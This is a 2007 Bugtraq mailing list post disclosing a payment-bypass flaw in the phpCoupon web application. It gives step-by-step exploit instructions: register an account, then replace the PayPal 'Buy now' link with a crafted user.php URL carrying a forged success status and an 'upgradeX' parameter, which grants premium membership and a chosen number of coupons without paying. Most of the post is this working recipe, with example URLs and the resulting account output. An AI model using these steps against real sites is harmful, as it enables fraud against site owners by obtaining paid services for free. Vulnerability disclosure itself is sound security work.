Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

phpCoupon Vulnerabilities

From: hack2prison () yahoo com
Date: 28 Jul 2007 05:18:04 -0000
Discovered by freeprotect.net member
Vendor site: http://phpcoupon.com
====================================
phpCoupon is Developed to provide an affordable and easy to operate local coupon websites for local and niche directory 
owners and entrepreneurs seeking income opportunites.
It has a security hole. Please show how to exploit following:
1. Click "Business Owners" and register account.
2. Login and show:
-------------------------------------------------
Membership Expiration:  00-00-0000
Maximum Coupons:        0       Coupons Used:   0       Coupons Available:      0
-------------------------------------------------
Meaning you aren't Premium Member.
3. Click "Billing Control Panel"
Click "Buy now" will redirect to paypal.com
OK, now copy this link http://site.com/path/user.php/user.php?REQ=auth&billing=141&status=success&custom=upgradeX and 
paste override paypal link.
Note: =upgradeX ---> X is number of coupon you need. Example: 
http://site.com/path/user.php/user.php?REQ=auth&billing=141&status=success&custom=upgrade5
OK now relogin you account you see:
-------------------------------------------------
Membership Expiration:  07-28-2007
Maximum Coupons:        0       Coupons Used:   0       Coupons Available:      0
-------------------------------------------------
You are Premium Member!!!!
Previous By Date Next
Previous By Thread Next

Current thread: